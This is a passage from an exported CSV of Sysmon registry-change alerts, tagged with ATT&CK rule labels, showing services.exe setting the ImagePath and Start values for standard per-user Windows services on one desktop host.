C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.602",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.976587900Z"",""eventRecordID"":""659"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.591",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.976314000Z"",""eventRecordID"":""658"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.522",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.975430800Z"",""eventRecordID"":""657"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.399",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.975066600Z"",""eventRecordID"":""656"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:18.377",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.972889200Z"",""eventRecordID"":""655"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.349",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.972525700Z"",""eventRecordID"":""654"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.321",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.971222500Z"",""eventRecordID"":""653"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.313",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.970693800Z"",""eventRecordID"":""652"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.287",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.969829000Z"",""eventRecordID"":""651"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.282",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.969532000Z"",""eventRecordID"":""650"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.224",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.968282400Z"",""eventRecordID"":""649"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:55:18.215",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.967773800Z"",""eventRecordID"":""648"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.157",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.966049900Z"",""eventRecordID"":""647"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:55:18.112",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.965673100Z"",""eventRecordID"":""646"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.068",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.964518900Z"",""eventRecordID"":""645"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.053",9,"ATT&CK T1058:Registry edit for new 